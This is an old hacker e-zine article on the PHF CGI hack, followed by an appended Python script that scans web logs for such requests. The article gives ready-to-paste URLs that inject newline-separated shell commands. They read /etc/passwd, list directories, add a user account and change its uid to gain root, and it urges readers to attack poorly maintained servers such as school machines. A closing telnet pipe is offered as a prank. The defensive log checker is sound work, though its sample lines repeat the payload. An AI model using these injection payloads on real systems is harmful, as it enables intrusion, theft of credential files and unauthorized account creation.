¦ R E A L I T Y C H E C K N E T W O R K! ¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ From Issue #33 - PHF Web Hacking ¦
¦ by Dagashi ¦
¦____________________________________________________________________________¦
¦____________________________________________________________________________¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ Alright there kiddies, it's time to lightly dive into the world of ¦
¦ how to obtain shells that do not rightfully belong to you and how to ¦
¦ generally piss off people on the Internet. As always, this is a well ¦
¦ known bit of information (because no one in their right mind would give ¦
¦ you an exploit to a system that no one else knows of), so I take no ¦
¦ responsibility for whatever you do with it. ¦
¦ ¦
¦ Since the majority of computers on the Internet are of UNIX descent, ¦
¦ I will mainly talk about their problems and such. Now, the majority ¦
¦ of us know that UNIX is full of holes and other problems no matter what ¦
¦ revisions and patches are made, so this might not come as a big surprise ¦
¦ when I tell you there is a common exploit that will run any program on ¦
¦ your victim machine. It is the PHF hack. Though it is no big deal to ¦
¦ the majority of ISP's, most little companies do not have the time or ¦
¦ money to deal with all the problems of their operating systems. Small ¦
¦ schools that are NOT technologically oriented, like high schools with ¦
¦ T1's and such would be a good example. And so, this will work on some ¦
¦ of them. ¦
¦ ¦
¦ All that is required to be done is to put this into the URL of ¦
¦ Netscape: ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ¦
¦ ¦
¦ and you have a listing of the passwd file to use or abuse. But the ¦
¦ PHF exploit can do more than just that (for those of you who will be ¦
¦ flaming me for writing such a simple article). It can access any type ¦
¦ of program that is on the opposing computer and run it. ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ ¦
¦ ¦
¦ will give you the directory listing of everything from the root of ¦
¦ the system. From there, you can just alter it accordingly to have a ¦
¦ peek around the system to see what else you can learn. ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin ¦
¦ ¦
¦ would show you every command that is available in the bin dir. If ¦
¦ you slightly modified it, you would also be able to see the permissions ¦
¦ of the specific files. ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin ¦
¦ ¦
¦ which can come in handy since, well, seeing as how you have root ¦
¦ permissions you now have a nice little bit of information about how the ¦
¦ system functions and can use that to get even more access or information ¦
¦ out of it. ¦
¦ ¦
¦ Or the best one of them all: ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi ¦
¦ %20dagashi%20100%20 ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0 ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 ¦
¦ ¦
¦ Do that and you MIGHT have root access to the server by telnet. Be ¦
¦ forewarned that this is an old hack and many servers would not have the ¦
¦ PHF script still running or have chmoded it to 000. This can get you ¦
¦ into a bunch of trouble, so be careful. As I said before, this is well ¦
¦ known and I wouldn't give it out to you unless most system ¦
¦ administrators (if they deserve the title then they know this hack by ¦
¦ heart) knew it as well. But there are always those that don't deserve ¦
¦ the honor of the name, and to those, you have my full consent to fuck up ¦
¦ their machines to hell. ¦
¦ ¦
¦ For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1 ¦
¦ 25" in Linux and watch life become a ball. ¦
¦ ¦
+----------------------------------------------------------------------------+
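
Added example, not part of the original article: a log check a defender can run to find the requests described above, i.e. hits on a phf CGI whose decoded query string carries a newline (%0a), and to tell from the status code whether the script was still executable. It assumes Common Log Format; the name phf_findings and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [12/Mar/1997:04:11:02 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432',
    '192.0.2.10 - - [12/Mar/1997:04:11:40 -0500] "GET /cgi-bin/phf?Qalias=x%0A/bin/ls%20-la%20/bin HTTP/1.0" 403 210',
    '198.51.100.7 - - [12/Mar/1997:09:30:00 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',
    '198.51.100.7 - - [12/Mar/1997:09:31:00 -0500] "GET /index.html HTTP/1.0" 200 2048',
]

def phf_findings(lines):
    """Return one dict per phf request whose decoded query contains CR or LF."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        host, when, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().rstrip("/").endswith("/phf"):
            continue
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            raw = unquote_to_bytes(value.replace("+", " "))
            if b"\n" not in raw and b"\r" not in raw:
                continue  # ordinary lookup such as Qalias=smith
            # Everything after the first line break is what the shell would see.
            injected = raw.replace(b"\r", b"\n").split(b"\n", 1)[1]
            findings.append({
                "host": host, "time": when, "param": name,
                "injected": injected.decode("latin-1").strip(),
                # 2xx: the script ran. 403/404: removed or chmod 000.
                "script_ran": status.startswith("2"),
            })
            break
    return findings

if __name__ == "__main__":
    for finding in phf_findings(SAMPLE):
        print(finding)
```

Any finding with script_ran set to True means the phf script answered the request and the host should be treated as compromised until shown otherwise.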